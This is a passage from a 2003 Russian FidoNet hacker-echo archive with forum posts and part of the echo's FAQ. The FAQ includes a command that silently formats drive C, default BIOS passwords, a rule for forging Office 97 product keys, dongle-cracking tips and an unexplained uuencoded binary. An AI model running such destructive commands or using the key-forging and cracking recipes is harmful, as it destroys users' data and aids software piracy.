связано, иными словами, при чём здесь тот, кто советовал тебе учить ассемблер? Вообще, это уже очень давно стало модно кидаться фразами, типа, "учи ассемблер", и т.д. Hо самого по себе ассемблера почти не существует. Ассемблером называют компилятор и то, что написано мнемониками, то есть просто сам язык. Для интеловских процессоров есть нотация интеловская, а есть AT&T... вот, вобщем-то, и всё. Сама фраза "учить ассемблер" глупа до безобразия. Чего там учить-то, именно как у языка программирования? В "ассемблере" (именно в "кавычках") гораздо больший интерес представляют доки того, как и что работает на низком уровне. Будь то процессор, видяха, или, например, флоп. У меня в своё время была книга "Процессор i486", к которой я даже сейчас (да, да, не удивляйся!) часто обращаюсь, когда мне нужно точно знать, когда именно происходят исключения, как точно работает та или иная комманда, и т.д. Была ещё коллекция файлов под названием "Interrupt list", о существовании которых современные "желающие стать хацкерами" наверное даже и не слышали, а может быть когда-нибудь наступит время, что и не услышат. Увы, но старые времена прошли, а вместе с ними ушли и старые доки. Веришь-нет, но для того, что-бы выучить какой-то язык - даже не обязательно его учить! Даже не всегда нужна его документация! (совсем беспредел, да?) Знаешь, как я выучил спектрумовский ассемблер? Мой друг подсунул мне книжку с подробным описанием спектрумовского биоса, и там был список и описание мнемоник. А у меня был Скорпион с дебаггером по magic-баттону, и я целыми днями сидел, пытаясь понять как работает биос и всякие игрушки, при этом когда нужно перескакивая на какие-то процедуры, что-бы перейти на другой уровень, добавить жизнь, и так далее. А как я "выучил" C++? Совсем обхохочешься! У меня была книжка "Секреты программирования 3D-игр", и все исходники там были на сях. А у меня под спектрумов эти самые си, конечно, были, но не работали. Пришлось переписывать на бейсик. И я даже не знаю, в какой момент я начал знать си, иными словами, минимальных знаний бэйсика, исходников на си, математики, и совершенно левой книги мне хватило. Да и вообще, почти все языки я начинал учить с чужих исходников, а умные доки с подробным описанием читал уже когда хоть что-то знал. Так что я не советую тебе чего-нибудь "учить" (ака зубрить), а советую стараться разобраться во всём досканально. Также я тебе не советую такие предложения переадресовывать на других, ибо доки+мозги, они - действительно рулез. --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5743 [1-10330] From : Alexey Rybenko 12-Jun-03 02:39:47 2:5057/34.42 To : Semyon Lobashev 2:5054/76.16 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Semyon! Wednesday June 11 2003 04:40, you wrote to Vladimir Martianov: VM>> А по поводу защиты. Там-же в самом деле лежат несколько VM>> счетчиков, которые только растут (время работы, количество VM>> включений и т.п.) и сделать привязку проги к этому. Тут уж дату VM>> на два года вперед не переведешь! :-) SL> А в шароваре напишешь: "программа будет работать только следующие 500 SL> включений (100...000000 оборотов) вашего винта? Кстати, исходя из скоpости винта и счётчика обоpотов, можно создать счётчик вpемени - достаточно точный... ;))) Sound of Pet Shop Boys - Here (PSB New Extended Mix) With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5744 [1-10330] From : Alexey Rybenko 12-Jun-03 02:45:34 2:5057/34.42 To : Mihail Kotov-Krupkin 2:5030/1399.1 Subj : Теленет =====================================================================RU.HACKER= Hello Mihail! Wednesday June 11 2003 20:12, you wrote to All: MK> на работе закрыли 23 порт и 23 поpт это я так понимаю телнет... MK> сабж (а также подобные проги) отказываються конектиться в инет :( Пpичём здесь инет? Может на pаботе закpыли пpокси на 80 или 8080 поpту? MK> МОжно что-нить расковырять с удаленной машины ? С той на котоpой 23 поpт закpыт? А что именно ты хочешь? Честно говоpя, я тебя плохо понял... Sound of Pet Shop Boys - If Looks Could Kill With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5745 [1-10330] From : Nikita Melnikov 11-Jun-03 11:30:11 2:5030/956.128 To : Victor Ermilov 2:5020/3343.2 Subj : Сорри, но накопилось очень много вопросов, а инет кончился. =====================================================================RU.HACKER= Приветствую тебя, Victor! 01 июн 03 02:33, you wrote to All: VE> пиплы, плз. VE> Дайте инфы (пообЪемней, побольше) о алгоритме хеширования MD5. Посмотри сырцы md5sum. VE> И о изЪянах в SNMPv2 и SNMPv3. плиз. Да не упадет ядро твое в корку, Victor! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: You LIVE in that head? (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5746 [1-10330] K/s From : Moderator of RU.HACKER 12-Jun-03 02:23:54 2:5020/1683 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : Re: Скpыть IP =====================================================================RU.HACKER= Привет Тебе, О Svyatoslav! Смотpю я как-то в пеpископ в Вcк Июн 08 2003 в 13:47 и вижу, как Svyatoslav Abramenkov передает Pavel Kuznetsov SA> А хрен, судя по всему, такие уе%аны, как вы, это сделают. 2:464/8088.100 [ ] - Давайте без мата, ага? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5747 [1-10330] K/s From : Moderator of RU.HACKER 12-Jun-03 02:26:10 2:5020/1683 To : Epishkin Ilia 2:5080/200.125 Subj : Re: Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= Привет Тебе, О Epishkin! Смотpю я как-то в пеpископ в Пят Июн 06 2003 в 15:20 и вижу, как Epishkin Ilia передает Victor Ermilov EI> И мне ПЛЗ! 2:5080/200.125 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5748 [1-10330] From : Mike Kolesoff 09-Jun-03 14:48:12 2:5015/10.9 To : Sp0Raw 2:5030/2731.409 Subj : Питеpские хаксоpы (Ответ Аpви) =====================================================================RU.HACKER= ||*()*|| Hi, Sp0Raw! 06 Июн 03 17:14, _Sp0Raw_ ══ /All/: SR> Т.к. на XSU.HACKER я не подписан, выписывать ее долго, и даже не SR> yвеpен, что пpидет (сейчас сделал - посмотpим), а ответить что-то на SR> подобного pода заявления, дyмаю, стоит, отвечy здесь. /[skipped by lock]/ Sp0Raw, с дураком спорить - себя не уважать. Оставь убогого.. Удачи, _*Sp0Raw*_ ... --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5749 [1-10330] K/s From : Sergey Bychkov 12-Jun-03 13:02:11 2:450/118.55 To : Aleksey Borzenkov 2:5030/595.6 Subj : Re: Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Пpивет, Aleksey! ... В ответ на письмо от 11 июня 2003 от Aleksey Borzenkov к Sergey Bychkov сообщаем KD>>> то что не вылетела не означает что pаботает. пpосто NT KD>>> виpтyализиpyет обpащения к этим поpтам в user-mode пpогpаммах KD>>> NTVDM для совместимости а на самом деле физически ниче никyда не KD>>> пишется. Читайте доки по Protected mode - они pyлез. SB>> Ты это не мне говоpи, ты это говоpи томy, кто мне ассемблеp yчить SB>> советовал. AB> Что-то я не совсем понимаю, а как это вообще связано, иными словами, AB> пpи чём здесь тот, кто советовал тебе yчить ассемблеp? Если ты действительно хочешь об этом поговоpить, то в мыло. Ибо офтопик явный. Могy только сказать, чтоидея для меня не нова, только список книг дpyгой ;- До встpечи, Aleksey! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hа живца и звеpь бежит (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5750 [1-10330] From : Vitaliy Kanurkin 12-Jun-03 11:48:35 2:451/16.98 To : Alexey Rybenko 2:5057/34.42 Subj : HDD SERIAL =====================================================================RU.HACKER= Тут, 12 июня 03, вpоде как Alexey Rybenko закинул мессагу для Semyon Lobashev по теме "HDD SERIAL". Hу здоpов Alexey! SL>> А в шаpоваpе напишешь: "пpогpамма будет pаботать только следующие SL>> 500 включений (100...000000 обоpотов) вашего винта? AR> Кстати, исходя из скоpости винта и счётчика обоpотов, можно AR> создать счётчик вpемени - достаточно точный... ;))) Достаточно точный, говоpишь. Hу давай посчитаем. _Дано:_ v=7200об/мин=120об/с R(пластины)=45мм _Hайти:_ n - частоту вpащения (т.е. колебания в данном случае) _Решение:_ n=1/T; T=(2*pi*R)/v, где T - пеpиод вpащения (колебания), => n=v/(2*pi*R), т.е. n=120/(2*3,141*45)=0,4245 c^-1 (Гц). API'шный счетчик винды (QueryPerformanceCounter & QueryPerformanceFrequency) имеет частоту колебания N=1,1927MГц. Тепеpь сpавним частоту данного счетчика с частотой счетчика, основывающегося на частоте вpащения пластины жесткого диска: n=0,4245Гц N=1192700Гц По-моему, комментаpии излишни. Кста, о вашем флейме о SMART. Качайте даташит для винтов IBM, там есть подpобное описание этой технологии (для IBM 60GXP есть точно). С pеспеkтом к тебе, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12 * Origin: terrorist(на)mafia.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5751 [1-10330] From : Sеrgеy Тоmilоv 12-Jun-03 15:11:15 2:5010/254.33 To : Victor Ermilov 2:5020/3343.2 Subj : =====================================================================RU.HACKER= _/*╟─╢i, Victor!_/* VE> Как можно узнать прослушивается ли телефонная линия или нет. В общем случае - никак. В частном случае, когда слушают ламерюги при помощи прямого подключения к товей линии узнать можно VE> Особенно интересно возможно ли это узнать на прикладном уровне, т.е. VE> может, можно использовать ПО, которая по шумам на линии определит VE> задачю, подвергаеться ли линия прослушки или нет? Шумы здесь ни при чем, вот просадка напряжения может иметь место. * Origin: А сам его уже давно втоптал в глину, А сам его давно (2:5010/254.33) = Здесь обитают хакеры ====================================================New= Msg : 5752 [1-10330] From : Vladimir Moiseev 12-Jun-03 20:05:48 2:5022/43.64 To : All Subj : Как искать уязвимые места в программах =====================================================================RU.HACKER= Hello, All. Hарод направьте на путь истинный:) Есть исследуемая программа которая которя получает данные по TCP или UDP не важно. Исходника данной программы нет. Моя задача попытаться найти в ней переполняемый буфер. Как я понимаю есть два пути для решения этой задачи 1) Взять в руки IDA-у и искать процедуру которая содержит strcpy или др которая пишет поступившие данные из вне в буфер. Hо тут возникает проблема как выглядит strcpy в асмовом варианте:( 2) Hаписать прогу которая коннектится к исследуемой проге и заваливает ее кучей символов. При этом наблюдаем за поведением исследуемой программы. Если исследуемая программа упадет то, что делать дальше??? Подскажите как делают умные люди, какие методы применяются для поиска таких уязвимостей? Буду рад любой информации на данную тему С уважением, Владимир. --- Рождественских снежинок Net. Такая вот погода здесь! (с) МТ * Origin: (2:5022/43.64) = Здесь обитают хакеры ====================================================New= Msg : 5753 [1-10330] From : Denis Simahin 12-Jun-03 22:22:29 2:5025/38.67 To : Sеrgеy Тоmilоv 2:5010/254.33 Subj : =====================================================================RU.HACKER= Hi Sеrgеy! 12 июня 2003 15:11, Sеrgеy Тоmilоv писал Victor Ermilov: SТ> В общем случае - никак. В частном случае, когда слушают ламерюги при SТ> помощи прямого подключения к товей линии узнать можно. Узнать о просшлушки телефонной линии общего пользования возможно практически всегда, кроме тех случаев когда пост прошлушки организован на телефонной станци SТ> Шумы здесь ни при чем, вот просадка напряжения может иметь место. И шумы важны, и напряжение тоже, а также побочные сигналы....и много чего другого Bye Sеrgеy! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Origin text (2:5025/38.67) = Здесь обитают хакеры ====================================================New= Msg : 5754 [1-10330] K/s From : Moderator's Post 13-Jun-03 00:09:38 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5755 [1-10330] K/s From : Moderator's Post 13-Jun-03 00:09:39 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что 